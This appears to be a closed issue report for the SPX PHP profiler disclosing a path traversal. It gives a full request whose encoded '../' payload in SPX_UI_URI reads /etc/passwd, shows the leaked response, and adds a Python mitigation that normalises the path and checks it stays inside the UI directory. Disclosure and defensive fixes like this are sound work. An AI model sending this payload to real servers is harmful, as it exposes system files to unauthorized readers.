Closed thistehneisen closed 1 month ago
It's possible to retrieve system files through the SPX_UI_URI parameter:

Request:
GET /?SPX_KEY=dev&SPX_UI_URI=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/2
Host: www.[redacted].staging.[redacted].com
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Connection: close
Cache-Control: max-age=0
Response:
HTTP/2 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 10:26:11 GMT
Content-Type: application/octet-stream
Content-Length: 1479
Content-Security-Policy: upgrade-insecure-requests

root:x:0:0:root:/root:/bin/bash
messagebus:x:499:499:User for D-Bus:/run/dbus:/usr/bin/false
nobody:x:65534:65534:nobody:/var/lib/nobody:/bin/bash
man:x:13:62:Manual pages viewer:/var/lib/empty:/sbin/nologin
lp:x:498:489:Printing daemon:/var/spool/lpd:/sbin/nologin
systemd-timesync:x:484:484:systemd Time Synchronization:/:/sbin/nologin
systemd-coredump:x:485:485:systemd Core Dumper:/:/sbin/nologin
rpc:x:483:65534:user for rpcbind:/var/lib/empty:/sbin/nologin
[truncated]
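The mitigation for the report above, as an added example that is neither the reporter's code nor the profiler's own: the SPX_UI_URI value is decoded the way the web server decodes a query parameter, normalised under a UI asset directory, and served only if the resolved path stays strictly inside that directory. UI_ROOT, the function names and the benign request are constructed assumptions.

```python
import os
from urllib.parse import parse_qs, urlsplit

# Assumed directory holding the profiler's web UI assets (a placeholder, not the real path).
UI_ROOT = "/var/www/spx-ui"


def resolve_ui_path(ui_uri: str, root: str = UI_ROOT):
    """Map an already-URL-decoded SPX_UI_URI value to a file strictly inside
    `root`; return None for anything that would escape it (including the
    directory itself, which is never a file to serve)."""
    if "\x00" in ui_uri:                      # NUL bytes truncate C-style paths
        return None
    relative = ui_uri.lstrip("/\\")           # never treat the value as absolute
    root_norm = os.path.normpath(root)
    candidate = os.path.normpath(os.path.join(root_norm, relative))
    # Containment is checked on the normalised path, not on the raw string:
    # "/var/www/spx-ui/../../../etc/passwd" collapses to "/etc/passwd" and fails here.
    if not candidate.startswith(root_norm + os.sep):
        return None
    return candidate


def check_request_line(request_line: str):
    """Parse a GET request line; return (ui_uri_value, resolved_path_or_None).
    A value that resolves to None is a traversal attempt the server should
    refuse (403/404) and log rather than open."""
    _method, target, _version = request_line.split(" ", 2)
    values = parse_qs(urlsplit(target).query).get("SPX_UI_URI", [])
    if not values:
        return None, None
    ui_uri = values[0]                         # parse_qs has already %-decoded it
    return ui_uri, resolve_ui_path(ui_uri)


# Constructed samples: the request line from the report above plus a benign one.
REPORTED_REQUEST = ("GET /?SPX_KEY=dev&SPX_UI_URI=%2f..%2f..%2f..%2f..%2f..%2f..%2f.."
                    "%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/2")
BENIGN_REQUEST = "GET /?SPX_KEY=dev&SPX_UI_URI=%2fcss%2f..%2fapp.js HTTP/2"

if __name__ == "__main__":
    for line in (REPORTED_REQUEST, BENIGN_REQUEST):
        value, resolved = check_request_line(line)
        verdict = "BLOCK (escapes UI root)" if resolved is None else f"serve {resolved}"
        print(f"{value!r}: {verdict}")
```

The check runs on the decoded, normalised path, so encoding the slashes (as in the report) or mixing "./" and "../" segments makes no difference to the verdict.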